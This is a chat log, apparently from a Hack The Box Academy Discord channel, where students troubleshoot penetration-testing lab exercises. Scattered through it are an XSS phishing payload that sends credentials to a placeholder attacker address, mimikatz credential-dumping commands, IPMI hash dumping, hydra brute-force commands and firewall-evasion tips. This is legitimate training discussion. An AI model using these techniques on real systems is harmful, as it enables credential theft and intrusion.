#modules

I did mod it with 1337 and add /etc/hosts like the module said

and I still have this error

echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts

this is the command I used.

rebuild with a new jar file and I still have this same error

I even revert a box too.

Are you sure that's not meant to be replaced by the target ip or your ip?

let me try with my own ip

Idk what all it had you set up

Hey Marcie, have you started the CWEW by any chance?

No idea what CWEW is

But if you mean CWEE? no

This is the one

I gonna replace it with my IP

I haven't done this module so idk what it's expecting ¯_(ツ)_/¯

Also you typed it as 10.10.0.174

just like the module said, yes

Sometimes the examples aren't 1::1

well I gonna try with my ip

Sometimes you gotta determine when it's referring to your ip or the machine ip

And Sometimes you can tell by how it's phrased in the examples

nope

neither my ip works

Is it 10.10.10 or 10.10.0

Two conflicting things here

oh it's 10.10.10

sorry

Then why does your screenshot show 10.10.0?

oh no

Literally why I asked a minute ago

ok nevermind it didn't work

You can pop a shell from inside SQL?

well yes and no

depending on the context

ok nevermind it didn't work lol

sometimes

if it's set up a certain way you can even upload things

I finished this one today. I took a break yesterday and definitely forgot all about the etc host thing today but it all still worked just fine 🤷‍♂️

Hey i got this error everytime i run evil-winrm through proxychains on my local VM, when i do the exact same thing on the pwnbox it works. I checked both proxychains configuration files and they are the same

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Does anyone ran into this error before ?

that's not a winrm through proxychain error, that's just a winrm error

I guess update winrm ?

not work for me mate lol

wanna head to private DM ?

nah you'd need to update your ssl conf file

it's not really a winrm fully issue

it's how winrm uses openssl

worst case scenario, you need to reinstall your vm

as it's just cooked

Bedtime for me amigo but I'll deffo do what I can to help in the morning

Yeah i uninstalled evil-winrm multiple times, but nothing change im at v3.5 on my VM and pwnbox has v3.3

That module took my mojo today

again it's not really a full winrm issue even with purging and reinstalling stuff

google the error and see if you can find a fix

or chatgpt

I has been searching for 2 days

Some ppl talk about vpn issue

tried everything but nothing works

chatgpt won't help in this instance

So I thought maybe someone had already had that

maybe try this?#starting-point message adding these lines might fix it; if not then you're gonna have to reinstall your vm as a whole my dude

#modules message

forgot you can't see the starting-point channel since your account isn't linked

i'll try thank you 🙏

YOOO

I GOT IT WORK !

I GOIT IT WORK !

I can't find 😐

that's the one

you literally found it

also delete as it's a spoiler

that's literally it, just because it doesn't end in .ccache doesn't mean it's not a ccache file

Well, I cannot extract this file or use it as a keytab, what can I do?

dude

it's a ccache file

you don't need to do anything with it as a keytab

just put it as the KRB5CCNAME variable

and it'll work

heee

oky

it's explained in the section to do that

for ccache files, and it's how you impersonated julio earlier iirc

For the SMTP section of footprinting module it's asking for a user...

I'm using smtp-user-enum and have given it two different users...neither is being accepted.

if you use the right Method and the right wait times: you'll only get one answer

I'll just try them all.

The hint references a wordlist, but I'm not seeing one in the course materials.

there's a referenced wordlist in the section reading

oh wait isn't there the footprinting wordlist from the resources button?

Finally.

Not that I saw, no.

Oh wait...

the hint

LOL yeah 😛

You're awesome 🙂

deleting it but yeah

I pulled it with the big wordlist, just took a while.

always check the resources button when you go into a module

Many thanks.

I was checking the cheat sheet only :/

cheat sheet isn't always gonna be helpful or give context of the commands

Right, well at least I had a big enough wordlist XD

90 gigs worth.

I had more ready 😐

word of note: HTB will never have you running super large wordlists for bruteforcing

hello all

module: Cross-Site Scripting (XSS)

hi everybody! i was doing recursive fuzzing with ffuf in the attacking web application with ffuf module, but i forgot to connect to the academy-regular vpn! i tried to ping the ip:port given by the exercise but i did not pinged anything! I hope i didn't make a mess...but if i lost all the packages during ping i think i'm safe

section: Phishing

Phishing

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

am not able to remove the image url as requested although i have entered the correct code

can anyone who finished the XSS module dm me please

OKAY IM SORRY but that hard lab was bs in common services

not enough info about remote readin on linked servers using mssql

i literally had to read a 32 page article on all of it and on how to execute commands on remote links. which it did not touch on

hello everyone im new to this, so please excuse the stupid question but am i supposed to be setting up the VPS inside the VM or on my computer?

hey @fathom pendant . is there a simpler way i can solve this

this command just lists out too many things

Nope don't forget to do 2>/dev/null

The example command they give also works well

these two are still incorrect

@fathom pendant

Sec

alright

Your min size is wrong

It's asking for larger than 25k

-size +25k and -size -28k will narrow it further

Will there be any red team modules in the future?

alrigt finnaly got it

without lookig at ur answer

Probably

I'm having trouble understanding IPMI. I have taken notes on the section but I really want to get to the next section and its been a week of me reading and rereading the section and trying to understand it. Should I just do my best and start trying to break in and when I get the flags move on? I feel like maybe I need to come back to IPMI later but I am not gonna skip the section.

I am not gonna look up the answer but I'm just wondering if reading through it one time and just following along with the examples would be good for now.

I feel like this section can be completed by following along with the exact examples in the text.

I have read and reread many times and taken notes.

There's only one thing that's not necessary from that section

And that's the mask it gives

I am following along with examples and its not giving me username or password so I kind of can see

Other than that all good and should be able to use the provided wordlist or rockyou to crack it

ok thanks

If you're unsure why the hash you get from msfconsole doesn't just give you the answer, it's because the hash isn't in the default wordlist for that tool in msfconsole

Interesting.

I'm trying different wordlists

your sure its in rockyou? what username file should I use?

I'm going through various wordlists

let me go take a look

ok

rockyou does the job

It asks me to log in to the machine via SSH, but when I enter the password, I get an access denied error.

question - Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

for both user file and password file?

because it needs both a username and password file

unless I should just do IPMI usernames

and do rockyou for passwords

there is a suffix in hashcat that ignores the need for username

since you already have the username

Also the hash that ipmi gives you has the username

username:password/hash

What is your command?

hold on I think I got it

I set right username file and found rockyou.txt and set that to password file

we'll see if it cracks soon

its still not cracking let me show you my output

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name               Current Setting    Required  Description
   ----               ---------------    --------  -----------
   CRACK_COMMON       true               yes       Automatically crack common
                                                   passwords as they are obtai
                                                   ned
   OUTPUT_HASHCAT_FI                     no        Save captured password hash
   LE                                              es in hashcat format
   OUTPUT_JOHN_FILE                      no        Save captured password hash
                                                   es in john the ripper forma
                                                   t
   PASS_FILE          /usr/share/wordli  yes       File containing common pass
                      sts/rockyou.txt              words for offline cracking,
                                                    one per line
   RHOSTS             10.128.244.138     yes       The target host(s), see htt
                                                   ps://docs.metasploit.com/do
                                                   cs/using-metasploit/basics/
                                                   using-metasploit.html
   RPORT              623                yes       The target port
   SESSION_MAX_ATTEM  5                  yes       Maximum number of session r
   PTS                                             etries, required on certain
                                                    BMCs (HP iLO 4, etc)
   SESSION_RETRY_DEL  5                  yes       Delay between session retri
   AY                                              es in seconds
   THREADS            1                  yes       The number of concurrent th
                                                   reads (max one per host)
   USER_FILE          /usr/share/metasp  yes       File containing usernames,
                      loit-framework/da            one per line
                      ta/wordlists/ipmi
                      _users.txt


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> 

its doing soemthing wrong

where is the hashcat command?

thats just msf where it dumped the hash

you still need to crack it

ok so I need to look up where it dumped the hash?

Your rhost is wrong

ok hold on

You put 10.128

oooh wait you didnt even get the hash?

ok thanks

or whats the problem

Targets start with 10.129 on the vpn

It looks like they never got the hash

ok changed rhosts

thanks

okey yea that makes sense since after "run" he just gets] Auxiliary module execution completed

i though he was already cracking it

Same

Which is why I asked for command

ok ya I thought metasploit cracked it for you

Nope

Only if it's in the default wordlist

ok so I should look up where metasploit saves hashes?

it can if its default. but this one aint one of em

It tells you where it saves it to

But it should also print it in the terminal

The footprinting module is just...ugh.

ok thanks

i quite liked the medium lab

It's not that bad

¯_(ツ)_/¯

By far its one of the easier ones

sudo openssl s_client -connect 10.129.175.104:imaps

LOGIN BAD First parameter in line is IMAP's command tag, not the command name. Add that before the command, like: a login user pass

Why will it not let me login?

Managed to upload the shell via ftp and now accessing it via port 443 and https with authentication but I just seem to download the file and not execute it instead, a php file.

https://academy.hackthebox.com/module/116/section/1466

thanks ok figured out username and password and got flags

Imap commands require a prefix

<anything> [command] [parameters]

As shown in the examples

1 login user pass

But you can literally prefix it with anything AFAIK

😐

You can even use a 20 character string

This stuff is a trip.

Which is why it says "like: a login user pass"

The a is the prefix

wait till he gets to the point where he needs to figure out how to read the content of the email

1 fetch id body[]

https://tenor.com/view/zarex-gif-23990652

I will die on the hill that they need to change the all to body[]

https://tenor.com/view/epic-embed-fail-ryan-gosling-cereal-embed-failure-laugh-at-this-user-gif-20627924

The point is still made.

I would use ASCII art but...I'll banned for sure then.

have you managed to login now

The more you say you dislike it the worse it will be for you

Yes.

I like other things a lot.

Like Burp.

iirc you will see burp at shells n payloads the first time

If you read and follow #welcome you can avoid the skill issue

so a few away

They said they've done the cbbh path already iirc

ah

Yes.

But tbh knowing how to do things at a baseline is important

Enumeration/Footprinting isn't fun to me.

Well it's important

ufff thats the main point

And improper enumeration will bite you in the ass

To an extent, yeah. But with web apps it seems more straightforward.

Well cpts isn't about web apps

Not if I compile the app locally.

I know, that's why I'm doing it.

So get ready to struggle bus your way out of your comfort zone

It was just the one thing.

The prefix... 😐 I've never seen that before.

Also a lot of the stuff you'll see on the attacking common services section

I mean it's talked about and shown in the section

its in the module tho

It... I mean yeah but...it's counter-intuitive.

Not really

It is to me.

Idk how it's counter-intuitive tbh

Well, look at Bash.

Ok?

I don't need a prefix to throw a command at that...or anything else I've interacted with.

Looking at my bash terminal

Well this is a different technology

Why not have a prefix in SQL?

It's a...unique technology.

You have to end commands with ;

Yes.

But it MUST be a semicolon.

Which makes sense, because that goes back to C-type languages.

But also: at the end of the day, it WAS told to you

You just either glossed over it or didn't read

Glossed over for sure.

When you get stuck next time: re-read the section

Often the answer lies in the material

I want ice cream.

Go for it dude

1 FETCH 1 BODY[]

Cute...

Yes

The [] are actually important

i see, that's gonna be fire

Well yeah, it denotes an array.

Or in this case...content I guess.

It should be "" but whatever XD

Well it's basically telling it to grab all data within

Wouldn't that be an * ?

No, it shouldn't

No because thats not how the body data is stored

Ah, body data is stored in an array?

You can Google it and learn

https://stackoverflow.com/questions/37787767/fetch-imap-body-message-by-telnet

I will say, this is MUCH better than the OSCP.

The course for that made me want to put my face through a plate glass window.

https://nickb.dev/blog/introduction-to-imap/

Thanks. Yes SNMP is more straightforward.

Although that may be because I have a networking background 😛

trying to find a way to transfer back to my attack host. tried smbserver to trasnfer like in the ATtacking SAM and ATTACKING Lsass. Trying to get the lsass.dmp off the windows machine

smbserver did not work

if you are rdping, connect a drive or make an smbshare

you can also use POP3 which is slightly different but doesn't have all the folders/subfolders just good ole UID grabbing

@heavy edge tried smbshare. will try connecting a drive but idk if ive learned that yet

Interesting.

xfreerdp has /drive:

if you are dumping the lsass you should have learned about connecting a drive in the rdp section of footprintingn

it's not taught to you

yes it is.

theresa section where they tell yuo to connect a share

then it seems like they recently added it

i'm referring specifically to xfreerdp's /drive: option

not creating a share

that looks like a hash to me

note the purpose of this isn't to transfer files, it's to steal the hash

which you can use for multiple purposes; either a PTH technique or cracking it

ahhhhh i didnt even see that ;c

must be a recent add then

fie transfers which is before the passwords

it wasnt in foothold my bad

it's explained that's what you're doing

anywasy yeah if ur in the password section that measn you got thru file xfers section ideall in which it was shown there

@novel hinge

if they're in footprinting the method they're doing is literally explained in the SQL section

in password section currently

"password section"

you mean password attacks module?

yes xd

gotta stop calling modules sections my dude

ah then a lot of the stuff is taught to you already before that point

so these are multiple hashes that belong to multiple users? even though i wasnt able to get the file im guessing it read the contents of the lsass.dmp?

just follow the section along and you'll be fine

that hash specifically is the machine account

i know i know

that's not the lsass dump

ahhh

okok thank you

yeah thats not an lsass dump thats just an admin hash

did you look tt how to dump the lsass?

the section they're doing is about dumping lsass

yeah either through task manager or the other method i forgot i just do task manager

i know they arent dumping it

which has nothing to do with grabbing hashes

command line stuff

im on Pass the hash section

oh

what is it ur asking

because im lost now

they didnt give me the hash for davids account. how do i get his hash

im guessing through lsass right?

using the tools that were talked about

it can be, yes

dude read the question before it

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

ive tried mimikatz in c:\tools i wasnt able to get it thats why i started doing lsass

have you looked at how to use mimikatz?

becaue it tells you how to use it

nope use mimikatz

look at how you use mimkatz and youll be able to dump the hash

yes i went back in a previous section and did the dump and it didnt work ill try again and send my results back give me 2min

because the hash may also just not be present in lsass (it could be)

cmd as admin > mimikatz > priv::debug > token::elevate >lsadump::sam

iirc

you can also just look at the cheatsheet

i can't remember what section it tells you how to use mimikatz to extract info

does this look right?

the arrows weren't meant to be put in literal

........................

they were meant to be sequential steps

if people took me as literal as you do id be so goddamn rich rn

https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

here's a bunch of mimikatz stuff

ngl i did fiercly blow air out of my nose seeing that

I have a question regarding this module : Introduction to Windows Command Line:

I finished the first question: "SSH to with user "user0" and password "Start!"
The flag will print in the banner upon successful login on the host via SSH."

Question 2: "SSH to with user "user1" and password "previous flag"

• 1 Access the host as user1 and read the contents of the file "flag.txt" located in the users Desktop."

When I try to SSH and Access the host as user1 I get an error stating that the password is denied.

Do i do this while logged into User0?

no

"previous flag" is the previous answer

so user1 password would be the answer you got for user0, user2 password is user1 answer...

omg thank you~ I have been trying this for the past hour lol. Appreciate the help!

so i read through that post marcie, ended up just going back to the commands that execpanda gave. it doesnt show any credentials for a user named "david"

could be sekurlsa::loggedonusers

or a number of other things

sekurlsa::logonpasswords got it now. lets see if i can finish this section now

I'm on this question for the password attack module: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

So i've downloaded the resources.zip and ran this to make the wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Then I did hydra -l sam -P mut_password.list 10.129.202.64 ssh -t 4 first and now i've done hydra -l sam -P mut_password.list ssh://10.129.202.64

It has been cracking for fuckin decades somebody please help

attack a different service

there's more than ssh open

aw man

also: you can increase threads with -T

thanks i shouldnt have been rushing to play super mario bros wonder

step 0: enumerate

that one was a pain, i forgot the command first you do but you need to take in the first 20k so head --20000 xx.list > 20k.list. get rid of all the numbers at the beginning
then start cracking.

get that knocked in your head

you don't need to

i think hes doing that one right, i just did that one

i will knock it in

it just makes it go a bit faster

the main issue is attacking ssh

which for hydra is VERY slow

you can enumerate more to get the password in that one?

damn i just brute forced that one after taking the 20k

yes, there's multiple services running on it

i wanna say ftp, ssh, and smb? it's been a minute

i think youre right, i def remember ftp

nvm

anyone ?

Open wireshark and start listening on the main interface. I know it sounds crazy because there's no internet connection in the target box, but just run it and you'll see the traffic coming in. Then you'll be able to see HTTP packets and see the domain

Thank you very much !

u're a lifesaver! I've found the right direction of attack now.

@next bronze I can confirm your dump tool is pretty neat! It's a goto now 😄

awesome, thanks!

ill have to try it out

on this section https://academy.hackthebox.com/module/162/section/1572 documentation module i logged in to the whitehat as htb-student but it seems like there is no existing current report

it's in the module's resources iirc

i am stuck on flag4 on linux priv assessment

any hint , found tomcat but can't find any way to exploit

in windows privesc module does anyone know the difference named pipes, as in, Syntax: \\.\pipe\<pipename> or \pipe\<pipename> ? I can query LSASS with both but only SQL with the latter which makes me thinks it's an API or env thing?

https://learn.microsoft.com/en-us/windows/win32/ipc/pipe-names

as in .\accesschk.exe /accepteula \\.\Pipe\lsass -v & .\accesschk.exe /accepteula \Pipe\lsass -v both work

but .\accesschk.exe /accepteula \\.\Pipe\SQLLocal\SQLEXPRESS01 -v will not work

but .\accesschk.exe /accepteula \Pipe\SQLLocal\SQLEXPRESS01 -v will work

Thanks but already been through this and can't seem to find the reason

The period represents the local computer

but when it's omitted what does it mean? That's what I am trying to figure out

Guys if I do upto tier 2 modules will I be able to do htb boxes?

Like the hard ones?

maybe

¯_(ツ)_/¯

most boxes have some sort of gimmick/cve related to them

or their name hints at what the vuln may be

Guys I have a student gmail account right now. Eventually I'll get alumni gmail account.

Will I be able to use alumni gmail account to get student subscription

Ok

if it's a .edu email it should be fine

It's not a .edu email 🥲

one is globale scope the other is relative scope

it's how accesschk reads the input

then you're not likely gonna be able to access the student discount

@topaz sable
I don't have a .edu mail address and I've been able to get student discount
You'll need to contact support and send them a proof that you are student

PS: I have a .net mail address

^

i mean i used very broad words

Thanks

likely and generally aren't the always

the only people that know 100% would be support

Can I use the student mail and get discount even after I graduated college?

Will you be a student after you graduate?

RESPECT!

No?? But I will still have access to student mail id

Yes, if you have access to email id.

Module: Active Directory Enumeration and Attacks, Section: Credentialed Enumeration - from Windows, **Question: I can't seem to execute Snaffler **using .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

what errors are you getting>

its ok i found it in C:\Tools, false alarm

remember: .\ is convention for "current directory"

yep thanks mate

On Detecting DCSync/DCShadow the question:

Modify the last Splunk search in this section by replacing the two hidden characters (XX) to align the results with those shown in the screenshot. Enter the correct characters as your answer.

I got the correct answer, but I am wondering why replacing the XX with the wildcard " .* " dont show the answer .

| rex field=Message "(?P<gcspn>.*\/[a-zA-Z0-9\.\-\/]+)" 
| table _time, ComputerName, Security_ID, Account_Name, user, gcspn
| search gcspn=*```

because you're looking for something more specific

while wildcards can be useful they can also be so broad they miss the mark

but it returns just 6 events and if I replace with the answer it will show different events

shouldn't it return all the events?

not really

it's returning results that match a different set of criteria

Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

find might help

Why is there no new content on the academy ?

I would like to know the intention of the problem in "Firewall and IDS/IPS Evasion - Hard Lab".
When I search for ports, I see multiple filtered ports.
But I don't understand if --source-port can only get flags 53 port.
Why isn't the other port working?
And I don't know why I had to target a 50000 port.

53/tcp filtered domain
54/tcp filtered xns-ch
55/tcp filtered isi-gl
50000/tcp filtered ibm-db2

who can help me DACL Attacks Skill Assessment fourth question

I found r***** user can Owns for mic****group and I get hash for user

you asking why --source port was important?

well its common for IDS/IPS ( firewalls and intrusion detection systems) to be configured to allow some kind of traffic.
and since port 53 is DNS which a lot of firewalls "allow" traffic from it since its a dns, the packets/traffic appears legitimate.
so with source port 53 we can evade filters.

like with source port we can fool the IDS/IPS that the request or well traffic comes from a "Trusted" service.

Thank you Schainy .
However, port 53 and port 50000 are both filtered.
And when I scan all port, only 22 and 80 ports that are open are shown.
*HTB Questions : ow our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

let me boot up the challange

and see

module: Active Directory Bloodhound
Hello,
someone passed the last skills assessment question ?
Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

||I have a total of 15 AD users and 3 Azure users||, right ?

show me your command

my 5k is opened

d

have anyone can hint the dacl attacks module

nope, check the number of AD users again

normal users, not special or default accounts

My command is this.
But it's all filtered.

[★]$ sudo nmap -p53,50000 10.129.232.134
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-04 10:58 BST
Nmap scan report for 10.129.232.134
Host is up (0.14s latency).

PORT STATE SERVICE
53/tcp filtered domain
50000/tcp filtered ibm-db2

bro do you solved dacl attacks module

well yea firewall is filtering it, you need to add something to your command to evade it

Today i compelte web service and api attacks module at htb but i have some miss conception about soap.

My question is that soap is a web service or protocol ???

https://academy.hackthebox.com/achievement/906058/160

Hello man

https://academy.hackthebox.com/module/134/section/1219 Can you help me plz this

To know that the login admin, I must to look the token? But I do a list of the 200 UID and I don't find a diffent token ^^"

Maybe reset and try again, or do it via bash script potentially I forget if one came with module or I made the one I have in notes 😉

Thank you, Schainy. In the nmap scan result, port 53 was filtered and the relationship between the source port was misunderstood. Thank you very much for your kind explanation.

But you should know the admin uid by now.

Any different result when you manually manipulate the request?

Cleared this yesterday, had the same issues. Check the hint

#modules message
seems like he solved it

Hi All, I do have a question about the Skills Assessment of Shells & Payloads. I'm still chasing the second flag. I did investigate the blog and checked the post wiht relative exploti. Shall I fix the exploit or should I try to re-use the already present on the server?

what do you mean by fix the exploit?

The exploit does not require any fixing, import to metasploit and fire it up. =)

I loaded in msf the exploit from exploit-db but it' raise an error for the split function

I just re did the assessment like an hour ago and it worked fine on my end. No tweaking required.

maybe i did something wrong but it's complaining indeed 😓

set the vhost and it should work.

thanks for the help I'll try it out

if i may ask one more thing.. the foothold host is lagging very much. Is it normal?

iirc the foothold is indeed laggy. You can start the ssh server and go from there.

that's what's I'm doing but I can't type more than 3char straight hehe. I'll just be patiente 😄

doing the same with RDP, laggy af but at host 3 right now

skill issue just pivot or start sshd so you don't have to use rdp

finally

my ssh dont have a gui so i could look at the website

https://tenor.com/view/fun-fun-begins-star-wars-skywalker-gif-18356472

https://tenor.com/view/if-you-think-of-an-gif-20132469

We havent learned that yet

wait

so it's skill issue

what module are you on

shells n payload

oh

well to be fair i did it in the past but forgot so would need to look it up lol

you need to use the pwn box for that

i think

ew pwnbox

you don't

only one question directly asks about the location on the pwnbox

other than that; you can use your own machine

it was easier for me to use pwn on that one

i used my own vm just fine

¯_(ツ)_/¯

Hi! sorry can someone help me. I'm in the Footprinting Lab - Medium and after enter to remmina and find the user i can't enter as and admin because the password contains "@" and this caracter doesn't work as normal in my mac.

if someone knows why or how to resolve it i will really appreciate it

wrap the password in single quotes

oh wait remmina

idk how you normally get the @ in mac ¯_(ツ)_/¯

also idk what you mean by "this character doesn't work as normal"

Damn host 3 done in less then 10 min

are you copy/pasting the password you found? or manually typing?

if copy/pasting: are you sure you don't accidentally have any extra spaces?

i usually use alt+2 and it's not working, the @ never appear

try shift+2 if you're using a vm

Difficulty level is swapped

i tried to copy but it doesn't give me the option at all.

Hello

"doesn't give option at all" not descriptive

are you saying that for whatever reason it won't let you copy?

LINUX PRIVILEGE ESCALATION --> Docker --> where to start? I cannot find anything useful to start a docker with or something else...

true . took me quite a whilte to get into the first Host since i didnt know that || the footprinting computer is very important too ||

after that was quite easy

host 2 only problem was making the script run, once you did that you good to go

host 3 well yea speedrun

like you can't right-click -> copy or ctrl(cmd)+shift+c?

docker is already installed on the target.

also: as I said - it sounds like the keyboard is standard US keyboard layout - so shift+2 would be the @ sign

yes, i tried to manually copy and the controls for add the @ aren't working. i searched by internet other controls in case but also not working for add the @ necessary. Then i tried to copy the password but ctrl+c or use the mouse doesn't work or give me option to copy

you need to add shift to that if you're copying from a command line

copying from linux terminal requires the shift key, as ctrl-c is already bound to quit running process

are you using pwnbox?
i know mac is like cmd + g for @ in german keyboard layout

and once you in a pwnbox controls swap to native linux so ctrl shift V

shift c

they're trying to copy

Still dont know where to start, the used paths in the module dont work.

well to paste

ah

they're pasting into a GUI

Yeah, had to finesse the payload a bit for 1, other than it’s your typical boot2root system.

yea the || vhost || was the problem there.

Hello

Just finished a couple of CTFs. I noticed I had to look up a lot of stuff frequently (commands, services to use, what the next step would, etc.). Is this normal?

yes it's normal

especially if you're new to hacking

Gotcha, thanks!

Check if the user is in docker group, get the images from the docker service and you should be good to go.

Just gotta look back at the section from there..

if alt +2 doesnt work id try to switch keyboard layout to something like german since there its cmd + g or cmd + q im pretty sure and try with that if thats a workaround?

I dont know much about Docker except for what they reach out in the module... Sorry but I still dont know where to look at. The cheatsheet does not mention anything about Docker. With LXD they provided explanation

like that:
||```
MATCH (u:User)
COUNT(DISTINCT(u)) as u
return u

?

that could work but it will return a few extras, ignore the standard account and machine accounts

or you can just search @domain

you will have to review the section again or do some external research on that mate.

there was a whole explanation on docker daemon and clients, no?

Good afternoon I can't understand why the button is not interactble after I make my changes.

Module: Using Web Proxies
Section: Skills Assesment
Question: The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

What I have tried: I intercepted the response and removed disabled from the html code then forwarded the response but when I click the button there is no flag.

Yes there is, perfect understanding how it works after reading that but how do i access the deamon? Probably i've misinterpred of translated something wrong and keep missing the point because of that.

the daemon runs in the background, and we interact with it via the docker client.

Did some RTFM, slightly understanding now how it works. Now i need to find out to start what Docker and how. Thanks for the help.

the socket then bridges that gap between the client & server.

Hm will try. More of a Docker module than escalation techniques 😦

Found it with your help!

Thanks for the patience 🙂

you can check if docker is running on the target.(docker --version) if not that's when you upload a docker container but in this case it is up and running, so you just enumerate.. as shown in the section.

docker ps gives me running instances right?

@soft cedar I misunderstoond some of the explanation (English isnt my first language). With your help I've figured out what they tried to teach me. Thanks 🙂

yes

Guys what should I learn to be able to start cracking htb machines?

Hi, inside the Brute Forcing module there is the task to bruteforce the ssh login for a certain user. When I try to fire up hydra against the target I get the error that the target does not support password authentication. Trying to connect via ssh user@ip reveals that it actually does not. I am using the pwnbox so I am guessing this is a bug?

Can I speak with you in private message ? The bot don't accept my message 😅

just @domain in search

hello

It's the same result with this request: MATCH (u:User {domain: 'INLANEFREIGHT.HTB'}) COUNT(DISTINCT(u)) as total_nb_user return total_nb_user

it's not

I'm looking at it right now, they return different number of accounts

for me it's always ||15|| 🤔

Can someone from HTB Team explain how I can get help for one of the questions in the academy? I am a silver subscriber for it and I have my discord linked but I cannot find the option anywhere.

just search @INLANEFREIGHT.HTB in the search bar

Ah, it was the good old not thinking it through kinda deal. I solved it but I would still like to know how I can use one of the perks that comes with my silver subscription.

Is the total number of users is ||10|| ?

Is there a way to remove the pwnbox display in the modules? Every single time I switch to the module the display downsizes. A reload fixes the pwnbox, but when I've RDP'd into somewhere else the RDP sessions downsizes as well which isn't fixed on reloads.

no

however with most rdp tools you can enable dynamic resolution

which allows you to resize the screen

Are the CTF's self paced or anything? Also, do you only get two free hours and then you have to pay? I'm just asking...

wrong channel to ask; but CTFs are self paced -- and 2hr is lifetime of your account -- so yes

you can always use your own vm and the vpn

You can press on fullscreen which will make it jump to its own tab

Pwnbox is in the browser always.

sir

they're talking about while being in an rdp session

and they load a new page in academy

the full screen resizes down

I see.

Ma'am!

xfreerdp has /dynamic-resolution which allows resizing

Remmina is also a good choice if you prefer gui for whatever reason

"If xss.htb.net was an intranet application, would an attacker still be able to capture cookies via sniffing traffic if he/she got access to the company's VPN? Suppose that any user connected to the VPN can interact with xss.htb.net. Answer format: Yes or No"

Taking a poll.... who thinks it's possible to sniff HTTP traffic from other users by way of your local machine's client VPN interface?

Am I missing something or this is a poorly written question?

it's not poorly written

It's possible

I don't get your point? The question is quite clear and the scenario is 100% realistic.

I suggest rereading the section and maybe you glossed over something

this is very realistic

do you understand how vpns and network traffic work?

Why would TCP traffic end up reaching an incorrect VPN interface? It's not a broadcast, and this is session security, it's not talking about ARP poisoning, MITM, etc....

is htb academy poorly written

what do you mean incorrect vpn IF. it asks if YOU had access to the companys vpn

Where does the question state anything about an incorrect vpn interface?

Employees are connected to the companys infrastructure via client to site vpn.

Years of experience with AnyConnect and GlobalProtect. I have a very good understanding of what traffic I can see from my local machine when I connect to a VPN - it's traffic from my client to whatever server, not traffic from other clients

This is the scenario that is given to you.

No, the clients will share a certain vpn dedicated subnet.

you can still sniff that traffic from other clients to the server on the subnet

There are no broadcast domains or routing at play here. You are not grasping the question I feel like.

99% no

Incorrect.... you may be in the same IP pool, but that does not mean you are in the same L2/L3 segment as other clients

brother you're overthinking it

doyou understand how VLANS and subnetting works

it's not asking the granular details of it

Mate, stop it you are embarassing yourself here.

I'm just pointing out that it's a poor question

it's saying if it's possible

which it is

im not even to that module( looks at Marcie) yet and i understand it

It is ok not to know everything - I don't either but stop arguing over basic IT knowledge.

i'm taking the question at face value

I work in it-sec and I know how VPNs work.

i meant my use of module

not section

because modules and sections are inherently different

It's not, the academy material is crafted by people who are a lot smarter than most of us here including myself.

sections are parts of modules

wrong reply!

I meant this.

😡 i'm agreeing with you

@fathom pendant chill, I said - wrong reply 😄

Ik

fight fight fight fight

lmao

but the point is: The question was phrased in a broad manner

it wasn't phrased in a granular "if a or be" or "traffic getting routed to you somehow"

sniffing doesn't require seeing traffic come to you

especially since it's giving you an intranet site

It is a simple thing. If the question doesn't name other variables - they are not at play. Anyone who has done some sort of IT certification, knows this. Especially CCNA is known for this.

^ yup

https://tenor.com/view/michael-jackson-eating-popcorn-enjoy-i-like-nom-nom-gif-11040065238845078056

Name checks out.

Y’all on here being petty…? 👀

if you dont like the wording, apply to htb, take 4 years to advance to academy dev, find the backend academy site, find the SECTION then change it

petty? no

lmao

he is not wrong

nah just submit a suggested correction in #858470491676737536

then have the dozens of people that have completed it tell you why you're misunderstanding it ¯_(ツ)_/¯

she is also not wrong

I was trying to get him to avoid that

¯_(ツ)_/¯

she right?

Honestly, I am pretty high ranked in Tryhackme and I have been doing htb actively for the past 6 months and I am getting my ass kicked by the material on here but it's very high quality. I have yet to experience being wrongfully stuck at a box or module.

high rank on THM

(being high ranked on THM is a meme here)

Exactly, I doesn't mean shit.

Had to learn that the hard way.

i think if thm also didn't have any help like yt video and writeups thenits 1 % would hve any value

THM needs to have an entire network that doesnt allow writeups and resets the vpn every 30m

then 1% means something

true

Tbf I think it is good way to start for total noobs and it did help me get more in the red-teaming even though I worked for 3+ years as cybersecurity consultant but it got clear pretty fast that I needed to switch to htb.

i am 1 % i can say that it doesn't mean anyting

as of right now THM is for the ones who think 'del c:\windows\system32' is hacking imo

in here i am stuck in 0 point cube question

6.9.0

i enjoyed THM when i joined it, but its very hand holdy

To sum it up, yes.

80% of the networks hold your hand and tell you where to look

i have to say that 0 cube question is harder than other question

sometimes

https://tenor.com/view/maybeeeee-try-not-to-laugh-gif-12778510

You guys are killing me 😄 I literally said what you are now making fun of - that this platform is on a whole 'nother level in comparison.

what am i doing wrong here

Ok, now I'll be petty....

